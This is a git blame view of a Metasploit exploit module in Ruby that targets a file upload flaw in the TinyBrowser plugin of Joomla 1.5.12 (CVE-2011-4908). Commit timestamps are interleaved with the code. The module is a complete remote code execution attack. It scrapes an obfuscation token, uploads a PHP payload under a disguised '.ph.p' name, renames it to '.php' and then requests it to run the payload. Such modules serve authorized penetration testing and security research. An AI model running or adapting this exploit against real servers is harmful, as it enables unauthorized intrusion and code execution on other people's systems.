Files
metasploit-gs/modules/exploits/unix/webapp/joomla_tinybrowser.rb
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

176 lines
5.1 KiB
Ruby
Raw Normal View History

##
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
2013-10-15 13:50:46 -05:00
# Current source: https://github.com/rapid7/metasploit-framework
##
2016-03-08 14:02:44 +01:00
class MetasploitModule < Msf::Exploit::Remote
2009-12-06 05:50:37 +00:00
Rank = ExcellentRanking
2013-08-30 16:28:54 -05:00
include Msf::Exploit::Remote::HttpClient
2013-08-30 16:28:54 -05:00
def initialize(info = {})
super(update_info(info,
'Name' => 'Joomla 1.5.12 TinyBrowser File Upload Code Execution',
'Description' => %q{
This module exploits a vulnerability in the TinyMCE/tinybrowser plugin.
This plugin is not secured in version 1.5.12 of joomla and allows the upload
of files on the remote server.
By renaming the uploaded file this vulnerability can be used to upload/execute
code on the affected system.
},
'Author' => [ 'spinbad <spinbad.security[at]googlemail.com>' ],
'License' => MSF_LICENSE,
'References' =>
[
2012-06-28 00:37:37 -05:00
['CVE', '2011-4908'],
['OSVDB', '64578'],
2012-10-23 21:02:09 +02:00
['EDB', '9296'],
['URL', 'http://developer.joomla.org/security/news/301-20090722-core-file-upload.html'],
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Compat' =>
{
'ConnectionType' => 'find',
},
'Space' => 1024,
},
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [[ 'Automatic', { }]],
2020-10-02 17:38:06 +01:00
'DisclosureDate' => '2009-07-22',
'DefaultTarget' => 0))
2013-08-30 16:28:54 -05:00
register_options(
[
OptString.new('URI', [true, "Joomla directory path", "/"]),
])
end
2013-08-30 16:28:54 -05:00
def check
2013-01-30 23:23:41 -06:00
uri = normalize_uri(datastore['URI'], 'plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php')
uri << '?type=file&folder='
res = send_request_raw(
{
2010-04-07 20:25:34 +00:00
'uri' => uri
}, 25)
2013-08-30 16:28:54 -05:00
if (res and res.body =~ /flexupload.swf/)
2014-01-21 13:03:36 -06:00
return Exploit::CheckCode::Appears
end
2013-08-30 16:28:54 -05:00
return Exploit::CheckCode::Safe
end
2013-08-30 16:28:54 -05:00
def retrieve_obfuscation()
2013-08-30 16:28:54 -05:00
end
2013-08-30 16:28:54 -05:00
def exploit
2013-08-30 16:28:54 -05:00
cmd_php = '<?php ' + payload.encoded + '?>'
2013-08-30 16:28:54 -05:00
# Generate some random strings
cmdscript = rand_text_alpha_lower(20)
2010-04-07 20:25:34 +00:00
boundary = rand_text_alphanumeric(6)
2013-08-30 16:28:54 -05:00
# Static files
directory = '/images/stories/'
2012-11-08 17:42:48 +01:00
uri_base = normalize_uri(datastore['URI'])
2010-04-30 02:12:29 +00:00
uri_base << '/' if uri_base[-1,1] != '/'
2010-04-07 20:25:34 +00:00
uri_base << 'plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser'
2013-08-30 16:28:54 -05:00
# Get obfuscation code (needed to upload files)
obfuscation_code = nil
2013-08-30 16:28:54 -05:00
res = send_request_raw({
2010-04-07 20:25:34 +00:00
'uri' => uri_base + '/upload.php?type=file&folder='
}, 25)
2013-08-30 16:28:54 -05:00
if (res)
2013-08-30 16:28:54 -05:00
if(res.body =~ /"obfus", "((\w)+)"\)/)
obfuscation_code = $1
2017-07-19 12:48:52 +01:00
print_good("Successfully retrieved obfuscation code: #{obfuscation_code}")
else
print_error("Error retrieving obfuscation code!")
return
end
end
2013-08-30 16:28:54 -05:00
# Upload shellcode (file ending .ph.p)
data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"Filename\"\r\n\r\n"
data << "#{cmdscript}.ph.p\r\n--#{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"#{cmdscript}.ph.p\"\r\n"
data << "Content-Type: application/octet-stream\r\n\r\n"
data << cmd_php
data << "\r\n--#{boundary}--"
2013-08-30 16:28:54 -05:00
res = send_request_raw({
2010-04-07 20:25:34 +00:00
'uri' => uri_base + "/upload_file.php?folder=" + directory + "&type=file&feid=&obfuscate=#{obfuscation_code}&sessidpass=",
'method' => 'POST',
'data' => data,
'headers' =>
{
'Content-Length' => data.length,
'Content-Type' => 'multipart/form-data; boundary=' + boundary,
}
}, 25)
2013-08-30 16:28:54 -05:00
if (res and res.body =~ /File Upload Success/)
2017-07-19 12:48:52 +01:00
print_good("Successfully Uploaded #{cmdscript}.ph.p")
else
print_error("Error uploading #{cmdscript}.ph.p")
end
2013-08-30 16:28:54 -05:00
# Complete the upload process (rename file)
print_status("Renaming file from #{cmdscript}.ph.p_ to #{cmdscript}.ph.p")
res = send_request_raw({
2010-04-07 20:25:34 +00:00
'uri' => uri_base + '/upload_process.php?folder=' + directory + '&type=file&feid=&filetotal=1'
})
2013-08-30 16:28:54 -05:00
# Rename the file from .ph.p to .php
res = send_request_cgi(
{
'method' => 'POST',
2010-04-07 20:25:34 +00:00
'uri' => uri_base + '/edit.php?type=file&folder=',
'vars_post' =>
{
'actionfile[0]' => "#{cmdscript}.ph.p",
'renameext[0]' => 'p',
'renamefile[0]' => "#{cmdscript}.ph",
'sortby' => 'name',
'sorttype' => 'asc',
'showpage' => '0',
'action' => 'rename',
'commit' => '',
}
}, 10)
2013-08-30 16:28:54 -05:00
if (res and res.body =~ /successfully renamed./)
2017-07-19 12:48:52 +01:00
print_status("Renamed #{cmdscript}.ph.p to #{cmdscript}.php")
else
print_error("Failed to rename #{cmdscript}.ph.p to #{cmdscript}.php")
end
2013-08-30 16:28:54 -05:00
# Finally call the payload
print_status("Calling payload: #{cmdscript}.php")
2012-11-08 17:42:48 +01:00
uri = normalize_uri(datastore['URI'])
2010-04-07 20:25:34 +00:00
uri << '/' if uri[-1,1] != '/'
uri << directory + cmdscript + ".php"
res = send_request_raw({
2010-04-07 20:25:34 +00:00
'uri' => uri
}, 25)
2013-08-30 16:28:54 -05:00
end
end